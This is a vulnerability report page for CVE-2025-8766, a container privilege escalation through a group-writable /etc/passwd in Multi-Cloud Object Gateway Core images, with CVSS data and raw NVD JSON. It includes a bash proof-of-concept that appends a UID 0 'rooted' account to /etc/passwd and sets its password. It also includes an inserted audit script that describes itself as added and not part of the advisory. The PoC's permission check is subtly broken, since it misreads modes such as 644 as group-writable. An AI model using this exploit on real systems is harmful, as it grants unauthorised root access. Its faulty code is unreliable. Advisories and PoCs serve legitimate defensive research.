Security Vulnerability Report
CVE-2025-8766 CVSS 6.4 MEDIUM

CVE-2025-8766

Published: 2026-03-13 19:53:56
Last Modified: 2026-03-16 14:54:11

Description

A container privilege escalation flaw was found in certain Multi-Cloud Object Gateway Core images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.
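A defender-side check for the build-time condition described above, added here and not part of the advisory or of Red Hat's tooling: a POSIX shell audit that tests the group-write bit of /etc/passwd arithmetically (so a mode such as 0644 is not misread as writable), with the corresponding Dockerfile fix noted in the comments. Function names are my own.

```shell
#!/bin/sh
# Added example (not from the advisory): audit an image or running container
# for the CWE-276 condition behind CVE-2025-8766, a group-writable /etc/passwd.
# Build-time fix in a Dockerfile: RUN chmod 0644 /etc/passwd (clears the g+w bit).

# Returns 0 when an octal mode string (e.g. "664", "0664", "2775") has the
# group-write bit (0020) set. Tests the bit, not the digit characters,
# so "0644" is correctly reported as safe.
mode_is_group_writable() {
    mode=$(printf '%s' "$1" | sed 's/^0*//')
    [ -z "$mode" ] && mode=0
    [ $(( 0$mode & 020 )) -ne 0 ]
}

# Audits one file (default /etc/passwd). Returns 0 when safe, 1 when
# group-writable, 2 when the file cannot be stat'ed (GNU stat assumed).
audit_passwd_mode() {
    path=${1:-/etc/passwd}
    mode=$(stat -c '%a' "$path" 2>/dev/null) || {
        echo "ERROR: cannot stat $path"
        return 2
    }
    if mode_is_group_writable "$mode"; then
        echo "FAIL: $path mode $mode is group-writable (CWE-276)"
        return 1
    fi
    echo "OK: $path mode $mode"
    return 0
}

# Stand-alone use: audit the given path (default /etc/passwd). The verdict is
# printed; to gate a CI image check on it, call the function and exit with $?.
audit_passwd_mode "$@" || true
```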

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Multi-Cloud Object Gateway Core (for specific versions, refer to the official Red Hat advisory)
Red Hat OpenShift Container Platform (affected Multi-Cloud Object Gateway component)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-8766 PoC - Container Privilege Escalation via /etc/passwd
# This PoC demonstrates how a non-root user can gain root privileges
# by modifying /etc/passwd when it has group-writable permissions

echo "[+] CVE-2025-8766 Container Privilege Escalation PoC"
echo "[+] Checking /etc/passwd permissions..."

# Check current user
CURRENT_USER=$(whoami)
CURRENT_UID=$(id -u)
CURRENT_GID=$(id -g)
echo "[*] Current user: $CURRENT_USER (UID: $CURRENT_UID, GID: $CURRENT_GID)"

# Check /etc/passwd permissions
PASSWD_PERMS=$(stat -c '%a' /etc/passwd 2>/dev/null || stat -f '%Lp' /etc/passwd 2>/dev/null)
echo "[*] /etc/passwd permissions: $PASSWD_PERMS"

# Check if /etc/passwd is group-writable
if [[ "$PASSWD_PERMS" == *"2"* ]] || [[ "$PASSWD_PERMS" == *"6"* ]] || [[ "$PASSWD_PERMS" == *"7"* ]]; then
    echo "[+] /etc/passwd is group-writable - vulnerability may be present"
else
    echo "[-] /etc/passwd is not group-writable - this system may not be vulnerable"
fi

# Create new root user
echo "[+] Attempting to create root user..."

# Generate a password hash (empty password for demonstration)
# In real attack, use: openssl passwd -1 -salt abc123 'password'
NEW_USER="rooted"

echo "[*] Adding new user with UID 0..."

# Method 1: Using usermod (if available)
if command -v usermod &> /dev/null; then
    usermod -u 0 -o -g 0 -G root $NEW_USER 2>/dev/null && echo "[+] User modified successfully with usermod"
fi

# Method 2: Direct /etc/passwd manipulation
echo "[*] Alternatively, manually adding to /etc/passwd..."
echo "${NEW_USER}:x:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null && echo "[+] Entry added to /etc/passwd"

# Set password for the new user
echo "rooted:password" | chpasswd 2>/dev/null && echo "[+] Password set for new user"

echo "[+] PoC completed. Try: su rooted"

References

https://access.redhat.com/security/cve/CVE-2025-8766
https://bugzilla.redhat.com/show_bug.cgi?id=2387265

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-8766",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-13T19:53:56.157",
    "lastModified": "2026-03-16T14:54:11.293",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "A container privilege escalation flaw was found in certain Multi-Cloud Object Gateway Core images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container"},
      {"lang": "es", "value": "Se encontró una falla de escalada de privilegios de contenedor en ciertas imágenes de Multi-Cloud Object Gateway Core. Este problema se origina en la creación del archivo /etc /passwd con permisos de escritura para el grupo durante el tiempo de compilación. En ciertas condiciones, un atacante que puede ejecutar comandos dentro de un contenedor afectado, incluso como un usuario no-root, puede aprovechar su pertenencia al grupo root para modificar el archivo /etc /passwd. Esto podría permitir al atacante añadir un nuevo usuario con cualquier UID arbitrario, incluyendo UID 0, lo que llevaría a privilegios de root completos dentro del contenedor."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.5,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}
    ],
    "references": [
      {"url": "https://access.redhat.com/security/cve/CVE-2025-8766", "source": "[email protected]"},
      {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387265", "source": "[email protected]"}
    ]
  }
}